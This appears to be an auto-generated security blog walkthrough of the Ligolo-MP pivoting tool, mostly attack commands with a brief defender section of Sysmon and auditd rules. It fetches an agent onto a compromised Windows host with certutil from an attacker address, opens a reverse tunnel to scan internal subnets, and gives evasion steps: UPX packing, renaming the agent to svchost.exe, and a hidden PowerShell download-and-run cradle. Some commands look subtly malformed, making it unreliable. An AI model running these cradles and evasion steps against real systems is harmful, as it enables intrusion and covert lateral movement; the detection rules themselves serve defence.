Mastering Network Pivoting with Ligolo-MP: The Ultimate Red Team Tunnel for Internal Recon + Video

Listen to this Post

Featured Image

Introduction:

Network pivoting transforms a compromised endpoint into a launchpad for deeper internal network exploitation, bypassing firewalls and routing restrictions. Ligolo-MP elevates this technique by creating a VPN-like TUN interface with mTLS encryption, eliminating the need for legacy SOCKS proxies or manual port forwarding. This guide delivers a complete, hands-on walkthrough for deploying Ligolo-MP to pivot through internal subnets, enabling seamless lateral movement and reconnaissance.

Learning Objectives:

  • Deploy Ligolo-MP on Linux attacker machines and compromised Windows/Linux hosts for stealthy network pivoting.
  • Configure TUN interfaces, route traffic, and scan internal subnets using native tools like Nmap without proxy modifications.
  • Implement certificate-based authentication (mTLS) and multi‑session tunneling for collaborative red team operations.

You Should Know:

1. Understanding Ligolo‑MP Architecture and Installation

Ligolo‑MP operates by establishing an encrypted tunnel between your attacker machine (proxy server) and a compromised host (agent). The agent creates a TUN interface on the target network, making the attacker’s system behave as if it physically resides inside the internal subnet. No SOCKS or port forwarding is required—traffic is routed via the tunnel at the IP level.

Step‑by‑step installation on attacker machine (Linux):

 Clone the repository and build from source (requires Go)
sudo apt install golang-go git -y
git clone https://github.com/nicocha30/ligolo-mp.git
cd ligolo-mp
go build -o ligolo-mp cmd/proxy/main.go
go build -o agent cmd/agent/main.go

Alternatively, download precompiled binaries from releases
wget https://github.com/nicocha30/ligolo-mp/releases/download/v0.5.0/ligolo-mp_proxy_linux_amd64.tar.gz
tar -xzf ligolo-mp_proxy_linux_amd64.tar.gz

Windows agent installation (transfer the agent binary to compromised Windows host):

 On attacker machine, serve agent via Python HTTP server
python3 -m http.server 8000

On Windows target (after obtaining shell)
certutil -urlcache -f http://<attacker_ip>:8000/agent.exe agent.exe
  1. Generating mTLS Certificates and Starting the Proxy Server

Ligolo‑MP uses mutual TLS for encrypted communication and agent authentication. Self‑signed certificates are acceptable for testing; for operational security, use a trusted CA.

Step‑by‑step certificate generation and proxy startup:

 Generate CA key and certificate
openssl genrsa -out ca.key 2048
openssl req -new -x509 -days 365 -key ca.key -subj "/CN=Ligolo-CA" -out ca.crt

Generate server certificate
openssl genrsa -out server.key 2048
openssl req -new -key server.key -subj "/CN=ligolo-server" -out server.csr
openssl x509 -req -in server.csr -CA ca.crt -CAkey ca.key -CAcreateserial -days 365 -out server.crt

Start the proxy on attacker machine (listening on port 443 for agent connections)
sudo ./ligolo-mp -proxy -laddr 0.0.0.0:443 -ca ca.crt -cert server.crt -key server.key

On Windows (if using PowerShell for proxy):

.\ligolo-mp.exe -proxy -laddr 0.0.0.0:443 -ca ca.crt -cert server.crt -key server.key

3. Connecting the Agent from a Compromised Host

After transferring the agent binary to the compromised machine (Linux or Windows), run it to establish a reverse tunnel to your attacker proxy. The agent will automatically create a TUN interface on the target.

For Linux agent:

 On compromised Linux host
sudo ./agent -connect <attacker_ip>:443 -ca ca.crt

For Windows agent (requires Administrator privileges for TUN interface creation):

agent.exe -connect <attacker_ip>:443 -ca ca.crt

Once connected, the proxy console will show the agent’s IP (e.g., 10.10.10.1). Use the `session` command to interact:

 Inside proxy CLI
session 1
ifconfig  Shows agent's virtual TUN interface and accessible subnets

4. Routing Traffic and Performing Internal Network Scanning

With an active agent session, the attacker machine must add routes to forward traffic through the agent’s TUN interface. Ligolo‑MP automatically creates a TUN interface on the attacker side (usually ligolo0). Use native IP routing commands to send internal subnet traffic into the tunnel.

Step‑by‑step routing configuration (Linux attacker):

 Identify the tunnel interface (e.g., ligolo0)
ip link show ligolo0

Add route to the internal subnet accessible via the agent (e.g., 172.16.5.0/24)
sudo ip route add 172.16.5.0/24 dev ligolo0

Verify routing table
ip route show | grep ligolo0

Now run Nmap directly against internal IPs:

nmap -sT -Pn 172.16.5.10 -p 445,3389,22  Traffic goes through the tunnel

For Windows attacker (rare, but if using WSL or native Windows tunnel):

 Using route command on Windows
route ADD 172.16.5.0 MASK 255.255.255.0 <attacker_ligolo0_IP> METRIC 1
 Verify with `route print`

To scan multiple hosts, use toolchains without proxy environment variables—Ligolo‑MP routes at the network layer.

5. Multi‑Player Pivoting and Concurrent Tunnels

Ligolo‑MP supports simultaneous agent connections, enabling a team of attackers to pivot through different compromised hosts. Each agent operates independently, and the proxy can manage multiple sessions.

Step‑by‑step for collaborative engagement:

 On proxy console, list active sessions
sessions

Switch between sessions
session 2
ifconfig  View different internal network

Route additional subnets for session 2
sudo ip route add 192.168.10.0/24 dev ligolo0  Traffic for that subnet goes to current active session

To isolate traffic per session, use policy routing with Linux marks
sudo ip rule add from 10.10.10.0/24 table 100
sudo ip route add 172.16.5.0/24 dev ligolo0 table 100

This allows one Nmap scan against multiple subnets simultaneously by toggling sessions or using advanced routing.

6. Bypassing Firewalls and Limiting Detection

Ligolo‑MP’s encrypted mTLS traffic on port 443 (or any custom port) blends with HTTPS, evading basic egress filtering. However, defenders may monitor for unusual TUN interface creation or routing changes. To reduce detection:

  • Use a proxy listener on common ports (443, 80, 53) and mimic legitimate TLS handshakes.
  • Restrict ICMP and aggressive scanning through the tunnel to avoid triggering IDS signatures.
  • Implement traffic shaping: use `tc` (Linux) to limit packet rates.
  • For Windows agents, obfuscate the binary using packers (e.g., UPX) and rename `agent.exe` to a legitimate process name.

Step‑by‑step obfuscation:

 On attacker machine, compress the agent
upx --best -o agent_upx.exe agent.exe

Use PowerShell download cradle for stealth
echo 'Invoke-WebRequest -Uri "http://<attacker_ip>:8080/agent_upx.exe" -OutFile "$env:temp\svchost.exe"; Start-Process "$env:temp\svchost.exe" -ArgumentList "-connect <attacker_ip>:443 -ca ca.crt" -WindowStyle Hidden' | iex

7. Mitigation and Detection for Defenders

Blue teams can detect Ligolo‑MP pivoting by monitoring for unexpected TUN/TAP interfaces on endpoints, anomalous process creation of network agents, and outbound TLS connections to suspicious IPs. Implement the following countermeasures:

  • Enforce endpoint detection and response (EDR) rules that flag creation of virtual network adapters by non‑administrative processes.
  • Monitor Windows event logs for netsh, route add, or `certutil -urlcache` downloads.
  • Use Zeek (Bro) to inspect TLS certificate fields—self‑signed certificates with unusual CNs (e.g., “Ligolo‑CA”) are indicators.
  • Deploy network flow analysis for sudden route changes or ICMP echo requests originating from unexpected internal hosts.

Step‑by‑step detection with Sysmon (Windows):

<Sysmon>
<EventFiltering>
<ProcessCreate onmatch="include">
<CommandLine condition="contains">-connect</CommandLine>
<CommandLine condition="contains">ligolo</CommandLine>
</ProcessCreate>
<NetworkConnect onmatch="include">
<DestinationPort>443</DestinationPort>
<Image condition="end with">agent.exe</Image>
</NetworkConnect>
</EventFiltering>
</Sysmon>

Linux defenders can audit routing changes using `auditd`:

auditctl -w /proc/sys/net/ipv4/route -p wa -k route_change
ausearch -k route_change -i

What Undercode Say:

  • Ligolo‑MP revolutionizes red team pivoting by eliminating SOCKS complexity and providing native VPN‑like routing, making internal reconnaissance faster and stealthier.
  • The tool’s mTLS encryption and multi‑session support empower advanced lateral movement, but defenders must evolve to monitor for virtual interface creation and outbound TLS anomalies.
  • Adversaries using Ligolo‑MP shift the burden to network defenders: traditional proxy detection fails, requiring behavioral analytics on endpoint routing modifications and process behavior.

Prediction:

As zero‑trust architectures push micro‑segmentation, tools like Ligolo‑MP will drive defenders toward mandatory egress TLS inspection and behavioral baselining of network stack changes. Expect red teams to integrate Ligolo‑MP with C2 frameworks (Cobalt Strike, Mythic) and adopt domain fronting to further camouflage mTLS tunnels. Meanwhile, defensive AI models will soon flag anomalously added routes or virtual TUN adapters in real time, sparking an arms race between agile pivoting and ML‑based anomaly detection.

▶️ Related Video (82% Match):

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Network Pivoting – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky